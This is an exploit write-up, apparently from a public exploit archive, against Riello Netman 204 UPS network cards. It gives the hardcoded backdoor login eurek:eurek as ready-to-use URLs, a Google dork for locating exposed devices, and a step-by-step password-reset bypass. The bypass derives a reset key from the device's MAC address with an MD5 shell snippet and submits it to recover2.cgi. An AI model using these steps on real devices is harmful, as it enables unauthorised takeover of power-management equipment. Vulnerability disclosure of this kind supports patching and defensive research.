Netman 204 - Backdoor Account / Password Reset

# Exploit Title: Netman 204 Backdoor and weak password recovery function
# Google Dork: intitle:"Netman 204 login"
# Date: 31st Jan 2017
# Exploit Author: Simon Gurney
# Vendor Homepage: blog.synack.co.uk
# Software Link: http://www.riello-ups.co.uk/uploads/file/319/1319/FW058-0105__FW_B0225_NetMan_204_.zip
# Version: S14-1 and S15-2
# Tested on: Reillo UPS
# CVE : N/A

Netman 204 cards have a backdoor account eurek:eurek.

This account can be logged with by simply browsing to the URL
http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek

Due to flaws in parameter validation, the URL can be shortened to:
http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek

This backdoor has previously been reported by Saeed reza Zamanian under EDB-ID: 40431 here<https://www.exploit-db.com/exploits/40431/>, which shows how to utilise this to gain shell access however this did not give detail of how easy it is to log in to the device and access the administrative functions via the web interface.  The google dork provided also reveals some UPS exposed to the internet.

If an admin has changed the passwords, they can be reset by generating a reset key from the MAC address if you are on the same subnet:

NETMANID=204:`/sbin/ifconfig eth0 | awk '/HWaddr/ {print $NF}' `
KEY=`echo .$NETMANID | md5sum | cut -c2-10`

To generate the key, do an MD5 hash of 204:[MAC ADDRESS]
Such as,
204:AA:BB:CC:DD:EE:FF == 0354a655811843aab718cfcf973c7dab
Then take characters 2-10, where position 1 is character 1 (not 0).
Such as,
354a65581

Then browse to the url:
http://[ip]/cgi-bin/recover2.cgi?password=354a65581
or
https://[ip]/cgi-bin/recover2.cgi?password=354a65581


Passwords have now been reset.